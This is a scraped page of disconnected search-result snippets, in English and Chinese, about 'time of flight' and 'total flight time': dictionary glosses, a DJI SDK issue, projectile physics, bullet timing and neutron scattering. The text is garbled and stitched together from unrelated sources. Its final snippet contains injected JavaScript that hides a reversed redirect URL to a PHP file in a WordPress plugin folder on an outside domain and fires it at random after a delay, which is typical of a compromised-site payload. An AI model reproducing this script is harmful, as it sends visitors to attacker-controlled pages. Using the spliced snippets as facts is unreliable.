time of flight method 飞行时间法 time of flight spectrograph 飞行时间摄谱仪 time of flight arrangement 飞行时间装置 Time of flight analyzer 飞行时间分析器 相似单词 flight n. 1.[C,U]飞翔,飞行 2.[C](飞机的)班次;(某班次的)飞机;搭机旅行;飞机的航程 3.[C](飞鸟的)群;(飞机的)队(+of...
DJI Mobile SDK for iOS: http://developer.dji.com/mobile-sdk/ - How to get total distance and total time of aircraft flight? · Issue #556 · dji-sdk/Mobile-SDK-iOS
If T is the total time of flight for this projectile on level ground, then the sum, of these two times is equal to: View Solution Q2 There are two values of time for which a projectile is at the same height. The sum of these two times is equal to (T= time of ...
aThe bullet time of flight (tbullet) is determined by subtracting the time it takes sound to travel from the target back to the microphone (tsound) from the time recorded between the muzzle blast and target sound (ttotal), 子弹飞行时间(tbullet)取决于减去它采取声音对旅行从目标回到话筒的时间...
Total flight time from launch to impact for these types of weapons is usually less than 15 minutes when attacking low orbits. 这种类型卫星在执行低轨道攻击任务时,从发射到攻击的共需要不到15分钟的飞行时间。 article.yeeyan.org 2. Second, the candidate's total flight time must be more than 1000...
Lenzen, F., Scha篓fer, H., Garbe, C.: Denoising Time-Of-Flight Data with Adap- tive Total Variation. In: Bebis, G., Boyle, R., Parvin, B., Koracin, D., Wang, S., Kyungnam, K., Benes, B., Moreland, K., Borst, C., DiVerdi, S. (eds.) ISVC 2011, Part I. LNCS, ...
Analyzing time-of-flight neutron total scattering data involves many instrument-dependent corrections, including: detector deadtime, normalization of detector counts to beam monitor counts, time-of-flight to momentum transfer Q rebinning, use of vanadium (or an equivalent standard) data for both calibr...
total flight time 总飞行时间 total lead time 总提前时间 total testing time 总计试验时间 total aceess time 总取数时间 相似单词 treatment n. 1.[U]对待;待遇 2.[U]处理;论述 3.[U,C]治疗(+for) 4.[C]治疗法(+for) Total n. 总数,全体,合计; a. 全体的,总的,全然的 vt. 总计,共...
aThe software estimates the total flight time needed to cover the mission area. The estimated flight time does not include the time to get to and from the takeoff and landing locations, because these are not yet defined. The map shows the mission area in yellow, and the flight(s) required...
["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}to so-called “secret societies” of ...